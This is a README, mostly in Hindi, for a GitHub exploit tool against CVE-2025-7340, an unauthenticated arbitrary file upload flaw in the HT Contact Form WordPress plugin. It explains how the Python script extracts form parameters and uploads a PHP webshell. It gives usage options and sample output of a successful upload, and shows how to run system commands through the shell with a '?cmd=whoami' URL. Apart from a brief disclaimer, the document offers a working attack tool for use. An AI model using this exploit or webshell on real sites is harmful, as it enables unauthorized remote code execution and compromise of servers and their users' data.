
HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - अनधिकृत मनमाना फ़ाइल अपलोड
CVE: CVE-2025-7340
CVSS: 9.8 (गंभीर)
वर्डप्रेस के लिए HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. प्लगइन में temp_file_upload फंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण सभी संस्करणों में 2.2.1 तक मनमाना फ़ाइल अपलोड की संवेदनशीलता है।
यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से दूरस्थ कोड निष्पादन (RCE) हो सकता है।
इस रिपॉजिटरी में एक Python शोषण स्क्रिप्ट शामिल है जो संवेदनशील फॉर्म की खोज को स्वचालित करती है और प्रभावित साइट पर एक वेबशेल अपलोड करती है।
स्क्रिप्ट आवश्यक पैरामीटर (nonce, form_id, ajax endpoint) को बुद्धिमानी से पहचानती है और संवेदनशील पथ में एक PHP शेल अपलोड करती है।
✅ संवेदनशील फॉर्म URL उदाहरण:
http://target.com/contact/
✅ संवेदनशील फॉर्म उस पृष्ठ पर होना चाहिए जिसे आप -u विकल्प को देते हैं।
स्क्रिप्ट चलाने से पहले, आवश्यक Python मॉड्यूल स्थापित करें:
pip install -r requirements.txt
Content of requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com
| विकल्प | विवरण |
|---|---|
-h, --help | यह सहायता संदेश दिखाएं और बाहर निकलें |
-u, --url URL | लक्ष्य URL जैसे http(s)://target.com/contact |
एक बार शोषण सफलतापूर्वक समाप्त हो जाने पर, आप दिए गए पथ पर अपने अपलोड किए गए शेल तक पहुँच सकते हैं।
सिस्टम कमांड निष्पादित करने के लिए ?cmd=<your_command> जोड़ें।
✅ उदाहरण:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस कोड के किसी भी नुकसान या दुरुपयोग के लिए जिम्मेदार नहीं है।
किसी भी सिस्टम के विरुद्ध परीक्षण करने से पहले हमेशा स्पष्ट अनुमति लें।
Khaled Alenazi (Nxploited)
GitHub: Nxploited